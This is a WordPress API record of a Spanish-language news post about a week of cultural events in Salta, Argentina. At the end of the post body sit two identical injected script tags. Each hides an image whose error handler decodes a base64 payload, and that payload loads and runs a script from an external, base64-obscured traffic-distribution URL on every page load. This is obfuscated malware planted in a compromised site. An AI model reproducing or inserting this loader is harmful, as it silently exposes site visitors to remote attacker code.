{"id":5386,"date":"2025-07-30T11:47:45","date_gmt":"2025-07-30T14:47:45","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5386"},"modified":"2025-08-13T23:19:49","modified_gmt":"2025-08-14T02:19:49","slug":"semana-cultural-en-salta-arte-reflexion-y-movimiento","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5386","title":{"rendered":"Semana Cultural en Salta: Arte, Reflexi\u00f3n y Movimiento"},"content":{"rendered":"\n<p><strong><em>La programaci\u00f3n cultural de esta semana ofrece experiencias para todos los gustos: desde cine y teatro hasta mantras y arquitectura.<\/em><\/strong><\/p>\n\n\n\n<p>Salta vive una semana de intensa actividad cultural, con una agenda diversa que atraviesa el cine nacional, las artes esc\u00e9nicas, la reflexi\u00f3n cr\u00edtica y propuestas alternativas que conectan el arte con el bienestar y el conocimiento.<\/p>\n\n\n\n<p>Este&nbsp;mi\u00e9rcoles 30, a las 19:30 en el SUM, se realizar\u00e1 una conferencia cultural con entrada libre y gratuita que adem\u00e1s contar\u00e1 con certificaci\u00f3n acad\u00e9mica de la Universidad Nacional de Salta. Titulada \u201cLa encrucijada de la cultura en tiempos de libertarianismo\u201d, estar\u00e1 a cargo de los doctores Alejandro Ruidrejo (UNSa), Federico Carlos Penelas (UBA) y Ra\u00fal Javier Judi (UNSa), quienes abordar\u00e1n los desaf\u00edos actuales de la cultura en el contexto pol\u00edtico y econ\u00f3mico argentino.<\/p>\n\n\n\n<p>Ma\u00f1ana&nbsp;jueves 31 la jornada comenzar\u00e1 temprano con \u201cVanguardia\u201d, un evento \u00fanico en el NOA que convoca desde las 9:00 a profesionales y empresas vinculadas al dise\u00f1o, la arquitectura y el arte. Con un perfil formativo y de networking, contar\u00e1 con la participaci\u00f3n de firmas como Grupo MDay, RAC, Pinturer\u00edas Martel y Ergy. La cita es en el Teatro y para m\u00e1s informaci\u00f3n se puede llamar al 3874556069.<\/p>\n\n\n\n<p>El viernes 1 y s\u00e1bado 2 de agosto, el teatro vuelve a tomar protagonismo con \u201cEs un shot teatral\u201d, una experiencia en formato de microteatro que se presentar\u00e1 en doble funci\u00f3n a las 19:00 y a las 21:30. Bajo la direcci\u00f3n de Justina Ovejero y con el respaldo de Casa Ovejero, la propuesta ofrece un espacio donde actores y actrices en formaci\u00f3n pueden mostrar su trabajo ante un p\u00fablico real. Las entradas est\u00e1n disponibles en www.entradasegura.com.ar.<\/p>\n\n\n\n<p>El s\u00e1bado 2 de agosto por la ma\u00f1ana, a las 10:00, Santosha Yoga ofrecer\u00e1 un concierto meditativo con mantras en Juramento 180. El encuentro estar\u00e1 guiado por Carlos Satnam y quienes asistan deber\u00e1n llevar colchoneta, agua y, sobre todo, disposici\u00f3n para conectarse con el canto y la vibraci\u00f3n.<\/p>\n\n\n\n<p>Ese mismo d\u00eda a las 11:00, en la plaza, se realizar\u00e1 una jornada de Danzas Circulares con entrada libre y gratuita. Guiadas por M\u00f3nica Quintana, Adriana Ortega, M\u00f3nica Baz\u00e1n e invitados, las danzas buscan generar alegr\u00eda, salud y conexi\u00f3n a trav\u00e9s del movimiento colectivo. \u201cLas danzas circulares permiten conocernos a trav\u00e9s del cuerpo, la coordinaci\u00f3n, el equilibrio y el trabajo grupal\u201d, expresan las coordinadoras, quienes invitan a sumarse sin necesidad de experiencia previa.<\/p>\n\n\n\n<p>Finalmente, el domingo 3 de agosto a las 19:30, el escenario se transformar\u00e1 en un carrusel de emociones con la presentaci\u00f3n de \u201cEl Carrusel de Sarah\u201d por Triskel Dance. Con direcci\u00f3n de la maestra Adriana Peque\u00f1o y la maestra Rita Rodr\u00edguez, el espect\u00e1culo propone un viaje a trav\u00e9s de la danza, los sue\u00f1os y la llegada de nuevas vidas. \u201cCelebramos la danza como lenguaje del alma, como forma de nacer y renacer una y otra vez\u201d, afirman desde la compa\u00f1\u00eda, que contar\u00e1 adem\u00e1s con la participaci\u00f3n de bailarines invitados. Las entradas tambi\u00e9n se consiguen por www.entradasegura.com.ar.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La programaci\u00f3n cultural de esta semana ofrece experiencias para todos los gustos: desde cine y teatro hasta mantras y arquitectura. Salta vive una semana de intensa actividad cultural, con una agenda diversa que atraviesa el cine nacional, las artes esc\u00e9nicas, la reflexi\u00f3n cr\u00edtica y propuestas alternativas que conectan el arte con el bienestar y el [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5387,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-5386","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5386"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5386"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5386\/revisions"}],"predecessor-version":[{"id":6425,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5386\/revisions\/6425"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5387"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5386"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5386"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5386"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}